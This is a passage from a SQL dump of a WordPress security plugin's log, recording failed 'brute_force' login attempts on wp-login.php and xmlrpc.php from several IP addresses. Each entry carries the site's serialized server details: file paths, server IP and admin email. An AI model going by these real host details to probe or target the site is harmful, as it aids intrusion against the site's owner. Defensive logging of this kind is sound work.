empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.36.182.93\";s:11:\"REMOTE_PORT\";s:5:\"60858\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHHSiqbKGlf1IVly7OiGAAAAVA\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786250.8172\";s:12:\"REQUEST_TIME\";s:10:\"1568786250\";}}','notice','2019-09-18 05:57:32','2019-09-18 05:57:31',17740704,19231624,'https://bintara.com.my/wp-login.php',1,0,'69.36.182.93'),(24935,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"69.36.182.93\";s:11:\"REMOTE_PORT\";s:5:\"33646\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHHTa1FqYKvioG46Y4zNwAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786254.0208\";s:12:\"REQUEST_TIME\";s:10:\"1568786254\";}}','notice','2019-09-18 05:57:36','2019-09-18 05:57:34',18257416,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'69.36.182.93'),(24936,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"40742\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHIm61FqYKvioG46Y40HQAAAJg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786587.8342\";s:12:\"REQUEST_TIME\";s:10:\"1568786587\";}}','notice','2019-09-18 06:03:09','2019-09-18 06:03:08',17741072,19233808,'https://bintara.com.my/wp-login.php',1,0,'148.72.23.181'),(24937,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.72.23.181\";s:11:\"REMOTE_PORT\";s:5:\"41156\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHIn61FqYKvioG46Y40HgAAAJU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786591.1119\";s:12:\"REQUEST_TIME\";s:10:\"1568786591\";}}','notice','2019-09-18 06:03:12','2019-09-18 06:03:11',18257288,19554888,'https://bintara.com.my/xmlrpc.php',1,0,'148.72.23.181'),(24938,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"57912\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHJM61FqYKvioG46Y40jQAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786739.6948\";s:12:\"REQUEST_TIME\";s:10:\"1568786739\";}}','notice','2019-09-18 06:05:41','2019-09-18 06:05:40',17740704,19231624,'https://bintara.com.my/wp-login.php',1,0,'23.229.84.90'),(24939,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"23.229.84.90\";s:11:\"REMOTE_PORT\";s:5:\"58718\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHJNm4SfF9g@8lNlxwz@AAAAFc\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568786743.0565\";s:12:\"REQUEST_TIME\";s:10:\"1568786743\";}}','notice','2019-09-18 06:05:44','2019-09-18 06:05:43',18257416,19555272,'https://bintara.com.my/xmlrpc.php',1,0,'23.229.84.90'),(24940,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.148.68\";s:11:\"REMOTE_PORT\";s:5:\"35814\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHLOiR0vdvYEIduPCLdMgAAAQo\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568787258.5494\";s:12:\"REQUEST_TIME\";s:10:\"1568787258\";}}','notice','2019-09-18 06:14:20','2019-09-18 06:14:19',17742672,19234432,'https://bintara.com.my/wp-login.php',1,0,'159.89.148.68'),(24941,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"159.89.148.68\";s:11:\"REMOTE_PORT\";s:5:\"37022\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHLQq1FqYKvioG46Y43HwAAAIg\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568787266.4871\";s:12:\"REQUEST_TIME\";s:10:\"1568787266\";}}','notice','2019-09-18 06:14:27','2019-09-18 06:14:26',18259760,19558968,'https://bintara.com.my/xmlrpc.php',1,0,'159.89.148.68'),(24942,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"41.226.28.41\";s:11:\"REMOTE_PORT\";s:5:\"47218\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYHMf0QGijxhVPhG1M0W1AAAABM\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568787583.7033\";s:12:\"REQUEST_TIME\";s:10:\"1568787583\";}}','notice','2019-09-18 06:19:45','2019-09-18 06:19:44',17739856,19230904,'https://bintara.com.my/wp-login.php',1,0,'41.226.28.41'),(24943,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is 